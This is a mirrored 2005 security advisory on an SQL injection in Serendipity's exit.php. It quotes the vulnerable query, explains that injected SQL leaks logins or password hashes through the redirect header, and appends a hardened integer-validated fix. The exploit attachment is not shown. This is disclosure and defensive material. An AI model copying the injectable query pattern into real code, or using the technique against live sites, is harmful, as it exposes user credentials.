The OpenNET Project
serendipity SQL Injection vulnerability


Date: Wed, 13 Apr 2005 20:22:05 +0400
From: kreon <kre0n@mail.ru.>
To: [email protected]
Subject: serendipity SQL Injection vulnerability
Message-ID: <20050413202205.7e0c8bb1@xaero.tvpro.net.>
Organization: http://adz.void.ru/
X-Mailer: Sylpheed-Claws 0.9.12a (GTK+ 1.2.10; i686-pc-linux-gnu)

ADZ Security Team

Info

  Program:         serendipity web blog system
  Version:         0.8beta4
  Module:          exit.php
  Bug type:        SQL Injection
  Vendor site:     http://www.s9y.org/
  Vendor Informed: Yes
Bug Info

  // code start
  //.......
  $links = serendipity_db_query("SELECT link FROM {$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND entry_id = {$_GET['entry_id']}", true);
  //.......
  // no checks here...
  //.......
  if (is_array($links) && isset($links['link'])) {
      // URL is valid. Track it.
      $url = $links['link'];
  }
  //......
  if (serendipity_isResponseClean($url)) {
      header('HTTP/1.0 301 Moved Permanently');
      header('Location: ' . $url);
  }
  //......
  // code end

As we can see, if we insert some "bad" SQL code into $_GET['url_id'] or $_GET['entry_id'], the server returns a "Location: xxxx" header, where xxxx can be an account login or password hash :) Sorry for my English :)

Exploit/PoC: See exploit in attached adz_serendipity.pl
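The root cause is that both request parameters are interpolated into the SQL string unchecked, and whatever the query returns is reflected into the Location header. The following hardened version of the same redirect is an added example written for this page, not the vendor's patch and not part of the advisory; it assumes the two Serendipity helpers named above, serendipity_db_query() and serendipity_isResponseClean(), behave as the quoted code uses them.

```php
<?php
// Added example (not the vendor's fix): hardened exit.php redirect.
// Both ids are validated as decimal digit strings and cast to int before
// they reach the query, so no request-controlled SQL text can reach the
// statement. The looked-up link is only followed if it is an absolute
// http(s) URL, so a stray database value can never be reflected into the
// Location header.

if (!isset($_GET['url_id'], $_GET['entry_id']) ||
    !ctype_digit((string) $_GET['url_id']) ||
    !ctype_digit((string) $_GET['entry_id'])) {
    header('HTTP/1.0 400 Bad Request');
    exit;
}
$url_id   = (int) $_GET['url_id'];
$entry_id = (int) $_GET['entry_id'];

// The query now interpolates integers only; the table prefix comes from the
// application configuration, exactly as in the original code.
$links = serendipity_db_query(
    "SELECT link FROM {$serendipity['dbPrefix']}references
      WHERE id = $url_id AND entry_id = $entry_id",
    true
);

$url = '';
if (is_array($links) && isset($links['link'])) {
    $url = (string) $links['link'];
}

// Redirect only to a well-formed http(s) target that the existing
// response-splitting check also accepts.
$scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
if ($url !== '' && in_array($scheme, array('http', 'https'), true)
        && serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
    exit;
}

// Unknown or unusable link: fail closed instead of emitting a Location header.
header('HTTP/1.0 404 Not Found');
```

A request such as exit.php?url_id=1&entry_id=1 still redirects as before, while any non-numeric id value is rejected before a query is built.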
Contact

  ADZ Security Team
  URL:  http://adz.void.ru/
  IRC:  #adz @ QuakeNet
  MAIL: [email protected], [email protected] (for non-russian users)

Attachment: adz_serendipity.pl (application/octet-stream, base64-encoded Perl PoC; not reproduced here)
